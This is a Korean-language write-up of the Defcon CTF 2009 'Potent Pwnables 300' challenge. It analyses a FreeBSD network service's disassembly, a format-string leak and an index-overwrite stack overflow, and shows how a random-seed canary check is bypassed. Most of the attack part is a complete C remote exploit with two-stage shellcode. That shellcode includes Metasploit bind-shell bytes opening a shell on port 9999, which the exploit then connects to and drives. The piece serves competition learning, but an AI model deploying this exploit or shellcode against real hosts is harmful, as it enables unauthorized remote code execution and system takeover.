
=======================================================================================
Title: Defcon CTF 2009 Potent Pwnables 300 문제 해설
Author : 유동훈 (Xpl017Elz) in INetCop
E-mail : szoahc@hotmail.com
Home: http://x82.inetcop.org
Date: 2009/06/08
=======================================================================================

P.S: 작년에 이어 올해도 예선에서 wowhacker 팀을 도왔습니다. 올해는 Potent Pwnables 관련 문제가
너무 늦게 나와서 brute-force 도중에 대회가 끝나는 안타까운 상황이 발생했지만 풀어놓은게 억울해서
작성해 올려봅니다. ^^;

* Potent Pwnables 300

8일 새벽 3시 정도 되었을 때 처음 접한 문제입니다. pwn400 문제는 접해보지도 못했구요. pwn300 문제는
FreeBSD remote exploit 입니다. 처음 접속하면 다음 메시지와 함께 4byte를 입력받습니다.

--
$ telnet localhost 3663
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.freex0x.inetx0x.org.
Escape character is '^]'.
Mon Jun 08 03:03:27 2009
Press enter to continue:
test
Connection closed by foreign host.
$
--

이때 입력되는 4byte에서 format string 취약점이 발생합니다. 물론 실제 문제 풀이는 format string
exploit이 아니라 overflow exploit이라는 점입니다. 단지 overflow 시 필요한 정보를 제공하기 위해
format string 취약점이 존재하는 것이었습니다. 그럼, 바이너리 분석 후 중요한 부분만 설명하도록
하겠습니다. (대부분 리버스 엔지니어링 과정 자체를 궁금해하시는 분들이 계셔서 간단하게 덧붙이자면,
전반적인 함수 호출 구조를 먼저 파악하고 주요 함수들을 나열하여 분석하는 과정을 거치는데 짧은
시간내에 바이너리를 분석하기 위해 리버스 엔지니어링 툴을 사용합니다. 먼저 rec, strace, ltrace와
같은 도구로 전반적인 함수 호출 구조를 파악하구요. 각 주요 함수 분석은 objdump로 디스어셈블 결과를
토대로 구체화합니다. 그 이후 마지막으로 gdb를 통해 실행 중인 프로세스를 어태칭하여 각 레지스터
값과 스택, 힙 등의 메모리를 살피는 과정으로 분석을 마무리합니다.)

다음은 첫 번째 분석 과정을 통해 파악된 전반적인 함수 호출 구조입니다.

--
main()
|
+- init(); 소켓 초기화 함수
|
+- drop_privs_user(); 사용자 초기화 함수
|
+- loop(); 사용자 접속을 accept하여 client_callback() 함수 호출
   |
   +- fork();
      |
      +- client_callback() rand1 pseudo-random 정수 값을 얻을때 seed 값으로 쓰이는 global_canary 초기화 및 사용자 입력을 받는 함수
         |
         +- global_canary = get_random_int(); srand(global_canary); rand(); global_canary를 seed 값으로 이용
         |
         +- read_until_delim(); read 함수를 통해 4byte의 사용자 입력을 받음
         |
         +- fprintf(...,value); format string 취약점을 통해 앞서 저장된 rand1 pseudo-random 정수 값을 출력할 수 있음
         |
         +- handle_client(); 사용자의 입력에 의해 overflow가 발생하는 함수
--

handle_client() 함수가 중요하다고 판단되기 때문에 objdump로 디스어셈블하여 한 줄씩 파악하는
두 번째 분석 과정을 이어서 합니다.

--
08049420 <handle_client>:
 8049420:       55                      push   %ebp
 8049421:       89 e5                   mov    %esp,%ebp
 8049423:       81 ec 88 00 00 00       sub    $136,%esp
 8049429:       c6 45 94 64             movb   $100,-108(%ebp) %ebp-108 위치에 인덱스 값 100을 저장.
 804942d:       c7 45 fc 82 0e 0a 03    movl   $0x30a0e82,-4(%ebp) rand2의 seed 값을 작성.
 8049434:       8b 45 fc                mov    -4(%ebp),%eax
 8049437:       35 ff e7 04 08          xor    $0x804e7ff,%eax xor 연산을 통해 rand2의 seed 값을 완성.
 804943c:       89 45 fc                mov    %eax,-4(%ebp)
 804943f:       a1 38 aa 04 08          mov    0x804aa38,%eax global_canary  = get_random_int();
 8049444:       89 45 90                mov    %eax,-112(%ebp)

 현재, %ebp-4에는 위에서 xor하여 만들어낸 rand2의 seed 값 $0x0b0ee97d이 들어있습니다.
 %ebp-112 위치는 rand1의 seed 값으로 쓰일 global_canary 값을 담고 있구요.

 8049447:       c7 44 24 08 64 00 00 00 movl   $100,0x8(%esp,1)
 804944f:       c7 44 24 04 00 00 00 00 movl   $0x0,0x4(%esp,1)
 8049457:       8d 45 90                lea    -112(%ebp),%eax
 804945a:       83 c0 05                add    $0x5,%eax + 5 ; global_canary(%ebp-112)의 +5 위치
 804945d:       89 04 24                mov    %eax,(%esp,1)
 8049460:       e8 73 f5 ff ff          call   80489d8 <_init+0x134> memset(%ebp-112+5,0,100);

 아래 부분은 복잡해보여서 이해하기 쉽게 실행되는 순서대로 번호를 붙여봤습니다.
 앞서 설명한대로 %ebp-108은 %ebp-107부터 시작하는 버퍼의 인덱스 역할로 쓰이는 중요한 값입니다.

 8049465:       89 c7                   mov    %eax,%edi
 8049467:       eb 1c                   jmp    8049485 <handle_client+0x65> ------------------------+
 8049469:       0f b6 45 94             movzbl -108(%ebp),%eax (9) %ebp-108 값을 %eax로 불러옴.  <--+-+
 804946d:       83 e8 01                sub    $0x1,%eax (10) 불러온 인덱스 값을 1씩 뺌.            | |
 8049470:       88 45 94                mov    %al,-108(%ebp) (11) 다시 %ebp-108 위치에 넣음.       | |
 8049473:       0f b6 45 94             movzbl -108(%ebp),%eax (12) 1을 뺀 값을 다시 불러옴.        | |
 8049477:       0f be d0                movsbl %al,%edx (13) %edx에 저장 후                         | |
 804947a:       0f b6 05 48 aa 04 08    movzbl 0x804aa48,%eax (14) single_char 값을 %eax로 부름.    | |
 8049481:       88 44 15 95             mov    %al,-107(%ebp,%edx,1) (15) single_char를 저장.       | |
                                               %ebp-107[%edx]에 get_char()로 읽어온 값을 넣는 것임. | |
 8049485:       8b 45 08                mov    0x8(%ebp),%eax (1) 루프로 들어와서 제일 먼저 실행. <-+ |
 8049488:       89 04 24                mov    %eax,(%esp,1)                                          |
 804948b:       e8 70 00 00 00          call   8049500 <get_char> (2) get_char() 함수 호출.           |
 8049490:       a2 48 aa 04 08          mov    %al,0x804aa48 (3) single_char에 입력값 1byte를 저장.   |
 8049495:       0f b6 05 48 aa 04 08    movzbl 0x804aa48,%eax                                         |
 804949c:       3c 0a                   cmp    $0xa,%al (4) 해당 값에 '\n'이 들어왔는지 검사.         |
 804949e:       74 08                   je     80494a8 <handle_client+0x88> (5) 입력 끝이면 루프 종료 |
 80494a0:       0f b6 45 94             movzbl -108(%ebp),%eax (6) %ebp-108 값을 %eax로 불러옵니다.   |
 80494a4:       84 c0                   test   %al,%al (7) 0인지 검사                                 |
 80494a6:       79 c1                   jns    8049469 <handle_client+0x49> (8) 0 아니면 위로 이동 ---+

 80494a8:       8b 45 90                mov    -112(%ebp),%eax %ebp-112는 global_canary 값임.
 80494ab:       89 04 24                mov    %eax,(%esp,1)
 80494ae:       e8 b5 f5 ff ff          call   8048a68 <_init+0x1c4> srand(global_canary);
 80494b3:       e8 c0 f5 ff ff          call   8048a78 <_init+0x1d4> rand();
 80494b8:       a3 3c aa 04 08          mov    %eax,0x804aa3c global_canary을 seed로 하여 얻은 rand1 값 저장.
 80494bd:       8b 45 fc                mov    -4(%ebp),%eax rand2의 seed 값인 $0x0b0ee97d을 불러옴.
 80494c0:       89 04 24                mov    %eax,(%esp,1)
 80494c3:       e8 a0 f5 ff ff          call   8048a68 <_init+0x1c4> srand($0x0b0ee97d);
 80494c8:       e8 ab f5 ff ff          call   8048a78 <_init+0x1d4> rand();
 80494cd:       a3 40 aa 04 08          mov    %eax,0x804aa40 seed 값을 통해 얻은 $0x31337 값을 rand2에 저장.
 80494d2:       8b 15 3c aa 04 08       mov    0x804aa3c,%edx rand1(매번 변하는 pseudo-random 정수) 값과
 80494d8:       a1 40 aa 04 08          mov    0x804aa40,%eax rand2($0x31337) 값을
 80494dd:       39 c2                   cmp    %eax,%edx      서로 비교.
 80494df:       75 0a                   jne    80494eb <handle_client+0xcb> 다를 경우 exit로 점프 --+
 80494e1:       8b 55 90                mov    -112(%ebp),%edx rand1 seed인 global_canary 값과      |
 80494e4:       8b 45 fc                mov    -4(%ebp),%eax -4(%ebp) rand2 seed인 $0x0b0ee97d 값을 |
 80494e7:       39 c2                   cmp    %eax,%edx              서로 비교하여                 |
 80494e9:       75 0c                   jne    80494f7 <handle_client+0xd7> 다른 경우에만 ret 함. --+-+
 80494eb:       c7 04 24 02 00 00 00    movl   $0x2,(%esp,1)                                        | |
 80494f2:       e8 e1 f5 ff ff          call   8048ad8 <_init+0x234> exit(2); <---------------------+ |
 80494f7:       c9                      leave <-------------------------------------------------------+
 80494f8:       c3                      ret
 80494f9:       8d b4 26 00 00 00 00    lea    0x0(%esi,1),%esi

 잘 보시면 아시겠지만, objdump 부분을 중요한 파트별로 몇 부분으로 쪼개고 그렇게 쪼개진
 덩어리들을 굉장히 상세하게 한줄씩 따라가면서 분석하는 것을 볼 수 있습니다.
 이 과정에서 디스어셈블만으로 이해하기 힘든 부분은 gdb로 따라가면서 레지스터 값을 읽어보면
 어떤 행위가 실행되어 무엇이 저장되었는지를 쉽게 알 수 있습니다.
--

요약해서 옮겨보면 다음과 같습니다.

--
handle_client();
|
+- for(index=100;...;index--) %ebp-107[index]=get_char(); 100부터 1byte씩줄여나가면서 사용자의 입력을 받음. (index는 %ebp-108)
|
+- srand(global_canary); rand1=rand();
|
+- srand($0x0b0ee97d); rand2=rand();
|
+- if(rand1==rand2){ 조건문 #1: rand1(매번 변하는 pseudo-random 정수) 값과 rand2($0x31337) 값을 비교.
|   if(global_canary != $0x0b0ee97d) { 조건문 #2: rand1의 seed 값과 rand2의 seed 값 비교.
|    ret;
|   }
|  }
+- exit(2);
--

잘 살펴보면, %ebp-107[100] 위치부터 1byte씩 마이너스로 입력을 받는 것을 볼 수 있는데 바로 여기서
인덱스인 %ebp-108 위치를 덮어쓸 수 있는 overflow 취약점이 발생합니다. 100이 저장되어 1byte씩 감소하는
인덱스 값을 return address 위치 값인 0x73으로 변경하면 return address를 덮어쓸 수 있게 되는 것이죠.
(정리 #1: %ebp-108 = 0x73 값을 입력하면 다음 byte부터 return address를 overwrite 하게 됨)

하지만, handle_client() 함수의 에필로그 부분을 살펴보면 항상 exit(2); 함수로 종결되어 overflow으로
인한 eip 변조가 발생하지 않습니다. 결국, exit(2) 함수가 아닌 ret을 호출하여 변조한 return address로
리턴하도록 만드는 것이 중요합니다. (정리 #2: exit(2) 호출이 아닌 ret 코드를 호출해야 함)

좀 더 자세히 설명드리면 지금까지 열심히 설명한 주요 부분이 바로 handle_client() 함수의 에필로그
부분인데요. 조건문 #1 부분을 보면, 매번 변하는 pseudo-random 정수 rand1 값과 $0x31337(rand2) 값이
비교되는데 이 값들은 서로 다르기 때문에 종료 시 exit(2) 함수를 호출하게 됩니다. 그래서 overflow가
가능한 rand2 seed 값을 변경해야 합니다.

만약 rand2 seed 값을 rand1 seed 값으로 변경하면 어떨까요? 당연히 첫 번째 조건문의 rand1==rand2의
공식은 성립되겠지요. 하지만, 다음에 오는 조건문 #2에서 다시 좌절하게 됩니다. 그 이유는 seed 값끼리
비교하여 값이 같으면 exit(2) 함수를 호출하기 때문입니다. 그렇다면, rand1의 seed(global_canary) 값과는
다르면서 매번 변하는 pseudo-random 정수 값과는 같은 seed 값을 찾아야 두 가지 조건문 모두 성립될 것
같군요. 사실 이 부분을 가장 많이 고민했었고 많은 시간을 할애한 부분입니다.

다시 정리해서 결론을 말씀드리자면, pseudo-random 정수 값과 같으면서 seed 값은 다른 어떤 특정한 값이
존재합니다. 공격자는 rand1 pseudo-random 정수인 global_canary 값을 format string 취약점을 통해 알 수
있으므로 제일 먼저 이 결과 값에 대한 seed 값을 찾아야 합니다. 그래야 해당 seed 값에 0x7fffffff을
더하여 magic seed 값(?-임의로 붙였음)을 유추해낼 수 있기 때문입니다. 이렇게 계산해낸 magic seed 값은
rand1과 다른 seed 값을 갖지만 pseudo-random 정수 결과 값은 동일합니다. (정리 #3: magic seed 값을
찾아서 rand2 seed 값을 덮어써주면 ret 명령을 호출할 수 있음)

그래서 제 exploit에서는 brute-force를 통해 pseudo-random 정수 값에 대한 임의의 seed 값을 찾은 후
0x7fffffff를 더해서 계산한 새로운 seed 값을 return address와 함께 rand2 seed(%ebp+8) 위치에 덮어쓰도록
설계하였습니다. (exploit 작성 시, 주의할 점은 100byte가 거꾸로 들어간다는 점입니다. shellcode를 포함한
모든 입력 값은 거꾸로 넣어주어야 동작합니다.)

--
정리된 payload:
[dummy 65byte][stage1 shellcode 35byte][0x73][return address][dummy 4byte][rand2 magic seed 4byte][\n]
--

아차, 작성한 shellcode 설명을 깜빡했군요. stage1 shellcode의 크기는 가능한한 35byte 정도로 줄였구요.
바이너리 내에 read 함수 plt로 리턴하여 빈 공간으로 존재하는 0x0804aadc 위치에 78byte 정도의 stage2
shellcode를 입력하고 해당 주소로 리턴하는 코드입니다. (참고로 stage2 shellcode는 시간 관계상
metasploit의 bindshell을 빌려 사용하였습니다.)

--
stage1 shellcode 구조:
push $78 ; read() 함수 세 번째 인자
push $0x0804aadc ; read() 함수 두 번째 인자
push $4 ; read() 함수 첫 번째 인자
push $0x0804aadc ; read() 함수 호출 후 return 될 주소
push $0x08048b68 ; pwn300 바이너리 내의 read() 함수 plt 주소
ret
--

다음은 지금까지 설명한 exploit 입니다.

--
/*
** 0x82-queserasera_pwn300 - Potent Pwnables 300 remote exploit by x82
**
** --
** $ ./pwn300_ex
** return addr: 0xbfbfebf0
** rand1 pseudo-random integer value: 0x4496af7f
** find rand1 seed value: 0x1a16a4b2
** make new rand2 magic seed value: 0x9a16a4b1
** successfully!
** x82 was here
** FreeBSD freebsd 5.4-RELEASE FreeBSD 5.4-RELEASE #0: Sun May  8 10:21:06 UTC 2005     root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
** uid=1006(pwn300) gid=1006(pwn300) groups=1006(pwn300)
** ^C
** --
**
*/

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define TARGET_HOST "it's your testbed machine host addr" //"pwn23.ddtek.biz"
void exec_sh(int sock);

int main(int argc,char *argv[]){
	unsigned char stage1_shellcode[]= /* 35byte */
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x6a\x4e" /* push $78 */
		"\x68\xdc\xaa\x04\x08" /* push $0x0804aadc */
		"\x6a\x04" /* push $4 */
		"\x68\xdc\xaa\x04\x08" /* push $0x0804aadc */
		"\x68\x68\x8b\x04\x08" /* push $0x08048b68 (read() plt) */
		"\xc3"; /* ret */

	unsigned char stage2_shellcode[]= /* 78byte */
	/* bsd_ia32_bind -  LPORT=9999 Size=78 Encoder=None http://metasploit.com */
		"\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x0f\x89\xe1\x52\x42\x52\x42"
		"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
		"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
		"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
		"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";

	unsigned long i=0,j=0,sock,rand_num=0,addr=0;
	char buf[256];
	char rand_val[16];
	char ret_addr[16];

	if(argc>1){
		addr=strtoul(argv[1],0,0);
	}
	else addr=0xbfbfebf0;
	printf("return addr: 0x%x\n",addr);

	memset(ret_addr,0,sizeof(ret_addr));
	ret_addr[0]=(addr>>24)&0xff;
	ret_addr[1]=(addr>>16)&0xff;
	ret_addr[2]=(addr>>8)&0xff;
	ret_addr[3]=(addr>>0)&0xff;

	sock=setsock(TARGET_HOST,3663);
	memset(buf,0,sizeof(buf));
	read(sock,buf,sizeof(buf)-1); /* "time\n" */
	memset(buf,0,sizeof(buf));
	read(sock,buf,sizeof(buf)-1); /* "Press enter to continue:\n" */
	write(sock,"%x\n",3);
      	memset(buf,0,sizeof(buf));
	read(sock,buf,sizeof(buf)-1); /* "rand1 pseudo-random integer value\n" */

	// get rand1 pseudo-random intger value
	memset(rand_val,0,sizeof(rand_val));
	rand_val[0]='0';
	rand_val[1]='x';
	strcat(rand_val,buf);
	rand_num=strtoul(rand_val,0,0);

	printf("rand1 pseudo-random integer value: 0x%x\n",rand_num);
	for(i=0;i<0xffffffff;i++){
	    srand(i);
	    j=rand();
	    if(j==rand_num){
		printf("find rand1 seed value: 0x%x\n",i);
		i+=0x7fffffff;
		break;
	    }
	}
	printf("make new rand2 magic seed value: 0x%x\n",i);
	memset(rand_val,0,sizeof(rand_val));
	rand_val[0]=(i>>24)&0xff;
	rand_val[1]=(i>>16)&0xff;
	rand_val[2]=(i>>8)&0xff;
	rand_val[3]=(i>>0)&0xff;

	/* shellcode1 write */
	/* dummy 65byte */
	for(i=0;i<65;i++){
	    write(sock,"\x41",1);
	}
	i=sizeof(stage1_shellcode)-1; /* stage1 shellcode 35byte */
	while(i){
	    write(sock,&stage1_shellcode[--i],1);
	}
	write(sock,"\x73",1); 
	write(sock,ret_addr,4); /* brute-force, return address */
	write(sock,"\x61\x61\x61\x61",4); /* dummy 4byte */
	write(sock,rand_val,4); /* rand2 magic seed value */
	write(sock,"\n",1); /* stage1 end */

	for(i=0;i<78;i++){ /* stage2 shellcode 78byte */
	    write(sock,&stage2_shellcode[i],1);
	}
	close(sock);
	sock=setsock(TARGET_HOST,9999); /* success? */
	exec_sh(sock);

	exit(0);
}

int setsock(char *hostname,int port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in x82_addr;
 
	if((he=gethostbyname(hostname))==NULL)
	{
		herror("gethostbyname() error");
		exit(-1);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
	{
		perror("socket() error");
		exit(-1);
	}
	x82_addr.sin_family=AF_INET;
	x82_addr.sin_port=htons(port);
	x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
	bzero(&(x82_addr.sin_zero),8);
 
	if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
	{
		perror("connect() error");
		exit(-1);
	}
	return(sock);
}

void exec_sh(int sock)
{
	int pckt;
	int chk=0;
	char *cmd="echo 'x82 was here';uname -a;id;export TERM=vt100;\n";
	char rbuf[1024];
	fd_set rset;
	
	memset((char *)rbuf,0,1024);
	send(sock,cmd,strlen(cmd),0);

	while(1)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(sock+1,&rset,NULL,NULL,NULL);
#define CMD_CHK "x82 was here"
		if(FD_ISSET(sock,&rset))
		{
			pckt=read(sock,rbuf,1024);
			if(!chk&&strstr(rbuf,CMD_CHK))
			{
				fprintf(stdout,"successfully!\n");
				chk++;
			}
			if(pckt<=0)
			{
				close(sock);
				if(!chk)
					return;
				else exit(0);
			}
			rbuf[pckt]=0;
			fprintf(stdout,"%s",rbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			pckt=read(STDIN_FILENO,rbuf,1024);
			if(pckt>0)
			{
				rbuf[pckt]=0;
				write(sock,rbuf,pckt);
			}
		}
	}
	return;
}

/* eoc */
--

--
By "dong-hoon yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org
             My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--